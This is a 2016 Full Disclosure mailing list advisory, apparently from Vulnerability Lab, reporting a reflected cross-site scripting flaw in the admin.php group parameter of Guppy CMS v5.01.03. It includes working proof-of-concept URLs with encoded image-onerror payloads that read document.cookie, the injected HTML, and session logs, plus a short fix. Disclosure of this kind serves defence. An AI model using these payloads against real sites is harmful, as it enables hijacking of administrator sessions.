
Date: Tue, 2 Aug 2016 10:58:36 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web
 Vulnerability

Document Title:
===============
Guppy CMS v5.01.03 -  Client Side Cross Site Scripting Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1887


Release Date:
=============
2016-07-29


Vulnerability Laboratory ID (VL-ID):
====================================
1887


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
GuppY, the easy, free and databaseless web portal, will allow you to generate very easily a complete and interactive web site.
A guestbook, a forum and the possibility to easily add some mods as poll, gallery, directory, etc.

(Copy of the Vendor Homepage: http://www.freeguppy.org/?lng=en )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the official Guppy v5.01.03 open-source content management system.


Vulnerability Disclosure Timeline:
==================================
2016-07-29:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
GuppY  
Product: Gruppy - Content Management System (Web-Application) 5.01.03


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Guppy v5.01.03 open-source content management system.
The vulnerability allows remote attackers to inject malicious script codes on client-side browser to web-application GET method requests.

The vulnerability is located in the groups parameter of the admin.php file. Remote attackers are able to prepare special crafted malicious 
links to trigger a client-side cross site scripting issue aginst the cms administrator accounts. The request method to inject is GET and 
the attack vector is located on the client-side of the content management system.

The security risk of the non-persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
Exploitation of the persistent input validation web vulnerability requires no privileged web-application user account and only low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects to malicious 
source and non-persistent manipulation of affected or connected application modules.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] Administrator Backend - User Management

Vulnerable File(s):
				[+] admin.php

Vulnerable Parameter(s):
				[+] groups


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC. Exploitation
http://guppy-cms.localhost:8080/guppy/admin/admin.php?lng=fr&pg=members&act=6&group=%20%22%3E%3Cimg%20src=x%20onerror=prompt(document.cookie);%3E
http://guppy-cms.localhost:8080/guppy/admin/admin.php?lng=fr&pg=members&act=6&group=%20%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
http://guppy-cms.localhost:8080/guppy/admin/admin.php?lng=fr&pg=members&act=6&group=%20%22%3E%3Cimg%20src=x%20onerror=prompt(71337);%3E


PoC: Admin Backend (admin.php?lng=fr&pg=members&act=6&group)
<div class="tblc">
<br><p align="center">Ici vous pouvez <strong>ajouter</strong> ou <strong>supprimer</strong> un membre du groupe privé</p>
<br><hr>
<br><br><br>
<table class="bord" summary="" align="center" border="0" cellpadding="2" cellspacing="1" width="300">
  <tbody><tr class="forum">
    <td style="text-align:left;" width="66%"><b>Membres</b></td>
    <td align="center"><b>Supprimer</b></td>
  </tr>
</tbody></table><br>      <form name="members" action="admin.php?lng=fr" method="post">
      <input name="pg" value="members" type="hidden">
      <input name="regit" value="add" type="hidden">
      <input name="act" value="6" type="hidden">
      <input name="group" value=" " type="hidden"><[CLIENT SIDE SCRIPT CODE EXECUTION OF GROUPS!]img src="x" onerror="prompt(22);">" /&gt;
      <p style="text-align:center">Nouveau  membre :       <select name="member" style="width:120px;">
<option value=""> </option></select><br>
      <br><button type="submit" title="Enregistrer">Enregistrer</button>      </p></form>
      <br><p></p>
      <br><hr>
  <p style="padding:10px 0;" align="center">
  <a href="admin.php?lng=fr&amp;pg=members&amp;act=5">Retour Gestion des groupes</a><br>
  <a href="admin.php?lng=fr&amp;pg=members">Retour admin membres</a> || <a href="admin.php?lng=fr">Retour Admin</a> || <b><a href="admin.php?lng=fr&amp;logout=1">DECONNEXION</a></b></p>
  </div>


--- PoC Session Logs [GET] ---
14:14:47.103[95ms][total 2880ms] Status: 200[OK]
GET http://guppy-cms.localhost:8080/guppy/admin/admin.php?lng=fr&pg=members&act=6&group=%20%22%3E%3Cimg%20src=x%20onerror=prompt(31337);%3E 
Mime Type[text/html]
   Request Header:
      Host[guppy-cms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[GuppyAdmin=-1393274728; __utma=87180614.1614609677.1469523897.1469530273.1469534279.3; __utmc=87180614; 
__utmz=87180614.1469534279.3.2.utmcsr=guppy-cms.localhost:8080|utmccn=(referral)|utmcmd=referral|utmcct=/guppy/; 
__gads=ID=232d61c73d3bc7a4:T=1469523920:S=ALNI_MaExh82o6B4-ZkR9_wPq7yzQP0g1A; fusion23Up5_visited=yes; _pk_id.2.bb5e=62061ddadaeb545e.1469523926.3.1469535086.1469534277.; 
_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1469534277%2C%22http%3A%2F%2Fwww.13956872 hfd2incb.com%2Fdemo%2F1%2F52%2FPHP-Fusion%22%5D; PHPSESSID=e720qc68nh5ohs2cvjakq03ek4; 
_pk_ses.2.bb5e=*; __utmb=87180614.95.10.1469534279; __utmt=1]
      Connection[keep-alive]
   Response Header:
      Server[nginx/1.2.1]
      Content-Type[text/html; charset=;]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]
      Set-Cookie[GuppYUser=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0]
-
14:15:37.856[95ms][total 4423ms] Status: 200[OK]
GET http://guppy-cms.localhost:8080/guppy/admin/admin.php?lng=fr&pg=members&act=6&group=%20%22%3E%3Cimg%20src=x%20onerror=prompt(31337);%3E 
Mime Type[text/html]
   Request Header:
      Host[guppy-cms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[GuppyAdmin=-1393274728; __utma=87180614.1614609677.1469523897.1469530273.1469534279.3; __utmc=87180614; 
__utmz=87180614.1469534279.3.2.utmcsr=guppy-cms.localhost:8080|utmccn=(referral)|utmcmd=referral|utmcct=/guppy/; 
__gads=ID=232d61c73d3bc7a4:T=1469523920:S=ALNI_MaExh82o6B4-ZkR9_wPq7yzQP0g1A; fusion23Up5_visited=yes; _pk_id.2.bb5e=62061ddadaeb545e.1469523926.3.1469535289.1469534277.; 
_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1469534277%2C%22http%3A%2F%2Fwww.13956872 hfd2incb.com%2Fdemo%2F1%2F52%2FPHP-Fusion%22%5D; PHPSESSID=e720qc68nh5ohs2cvjakq03ek4; 
_pk_ses.2.bb5e=*; __utmb=87180614.97.10.1469534279; __utmt=1]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Server[nginx/1.2.1]
      Content-Type[text/html; charset=;]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]
      Set-Cookie[GuppYUser=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0]


Reference(s):
http://guppy-cms.localhost:8080/
http://guppy-cms.localhost:8080/guppy/
http://guppy-cms.localhost:8080/guppy/admin/
http://guppy-cms.localhost:8080/guppy/admin/admin.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable `groups` parameter in the add GET method request.
Disallow the usage of special chars to prevent client-side script code injection attacks.


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the guppy cms groups modul is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 				- admin@...lution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@...nerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/